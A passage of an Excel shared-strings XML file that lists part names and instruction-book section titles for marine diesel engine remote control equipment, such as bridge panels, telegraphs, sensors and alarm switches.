    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Earthing strap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut for cable gland</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefabricated terminal box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefabricated cabinet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Component placing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Marking Nos.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inlet connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Warning sign</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Opto coupler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Component house</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Miniature circuit breaker</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature limit switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface relay</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter for DIN-rail</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Limit relay</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Calculator relay</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ramp generator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pick-up amplifier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pick-up limiter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pick-up filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Voltage fixator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plug socket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hoods</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring-loaded plug</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw terminal plug</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OB-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MTP-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEG-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AP-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MTB-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MTD-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Touch-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M-panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency telegraph panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Telegraph gong</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency telegraph box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electric shaft control box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamp fixture</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Economizer box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Q80 Instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Q96 Instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Q144 instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Q48 instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Q72 instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension sketch instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign for Q96 instrument</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Legend cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCHING ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency stop</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Knob</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slotter nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arresting device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Figure dial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lens remover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Incandescent bulb remover+B95</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign for button 12.7x18.7</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign for lamp glass 24x48</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eprom - memory pack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Digital module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Serial interface module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BM2-module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BM-module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OM-module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power analyser</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control modul</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Display modul</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Software</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Module</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mouse</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Track ball</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Marine kit monitor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ethernet switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diode</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Motor potentiometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Multimeter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Calibrator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign - resopal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign - brass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign - ? 23</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign - F-sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Label adhesive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electric/pneumatic converter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power output sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Regulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature controller</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure controller</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crank case monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Order specification equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vibration</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI on line</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI off line</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing monitoring system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test HHJ</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Missing specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test form</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connection plug</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operator panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remote I/O</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Governor servo unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Governor control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connection kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connection plug assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear bearing shut down</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PT Pressure Transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PSL Pressure Switch Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PSH Pressure Switch High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAH/L Pressure Alarm High/Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAL Pressure Alarm Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PI Pressure Indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TE Temperature Transducer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TSH Temperature Switch High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAH Temperature Alarm High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TI Temperature Indikator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature Controlling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LSL Level Switch Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LSH Level Switch High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LS Level Switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAL Level Alarm Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAH Level Alarm High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SE Speed Transducer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SSH Speed Switch High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SZ Speed acting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SC Speed Controlling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ZT Position Transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ZSH Position Switch High</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ZS Position Switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Position Controlling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FAL Flow Alarm Low</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FS Flow Switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WT Weight/force Transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panel with transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable tray set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting drawing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panel with test valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panel with terminal box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>E-Prom with program</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Factory acceptance test</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>On board commissioning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Programming instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BMP 402A - Bridge man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BMS 402A - Bridge man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MHP_M - Man. handle panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BSP - Bridge safety panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BSS - Bridge safety panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLP - Bridge load reduction panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SMP 402A - Slave man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SMS 402A - Slave man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MHP_S - Man. handle panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MHP/PIP_S - Man. handle panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CMP 402A - Ctrl. room man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CMS 402A - Ctrl. room man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MHP_E - Man. handle panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CSP - Ctrl. room safety panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PCP - Propulsion ctrl. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RMP 402A - Resp. man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RMD 402A - Resp. man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AMP - Shaft alternator panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine load ctrl. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PPP - PTI/PTO ctrl. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Panama panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACU 402A - Alphatronic ctrl.unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propulsion control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Start/stop unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Autostop unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Load reduction unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting cabinet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dummy handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ETP_er-Emergency telegraph panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTI/PTO ctrl. unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Load program unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ESC - Elec. shaft control box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ETC - Emergency telegraph ctrl.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EDS connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Economizer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Isolation amplifier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VDR interface</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power supply, electric</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho, encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho, trigger ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power Management syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Filter control system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remote control system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear / clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust bypass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of cabinet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test - HHJ</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction, cabinet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensor specification lists</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Terminology</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Key drawing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Summary</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alarm system interface</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alarm cable diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Parameter set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check procedure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Function diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Curve diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Extern interface</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connection list</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lay-out</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLP - Bridge load reduction pane</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SMP 402A - Slav man. panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alpha lube lite</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly of box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bridge panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slave panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control room panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine control panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Back-up panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvre responsibility</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control units</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Interface units</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho converters</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operational equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Additional control units</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CoCoS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Econometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Communication equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvre log</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrument panels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remote control installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION BOOK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PAGE,LOGO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.I</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.III</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION, VOL.I</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION, VOL.II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION, VOL.III</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DESCRIPTION,COMP.,VOL.III</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TABLE OF CONTENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECKING and MAINT.SCHEDULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTION INDEX,IB 900- 913</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.I</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Introduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY PRECAUTIONS + ENGNE DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guidance Value Automation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Testbed adjustment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMO NOx Components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECKS DURING STANDSTILL PERIODS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING, MANOEUVRING + RUNNIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preparation for Starting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Loading</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preparation PRIOR arr in Port</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stopping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operation AFTER Arrival in Port</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control System, 50 - 108 ME/ME-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Description</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. Contr. Syst. FPP MC Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. Contr. Syst. CPP MC Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng. Contr.Syst. FPP MC/MC-C Eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crash-Stop, (FPP+Reversible CPP)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alarm Handling on MOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Auxilliaries</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maintenance</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Admin</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng.Control System - ME-B Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Troubleshooting Guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Unloading and Stopping Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operations after Stopping Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Recom. use Aux.Equipm.Standstill</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng.Contr. System - MC-S Engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operation MC-S Eng. Fuel Oil mix</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng.Contr.Syst. FPP,26-46MC/MC-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eng.Contr.Syst. CPP,26-46MC/MC-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL RUNNING CONDITIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fire in Scavenge Air Box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger Surging - Stalling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Run. Cyl. or TC out of Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Run. Crack.Cyl.Cover Studs/Stayb</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL AND TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
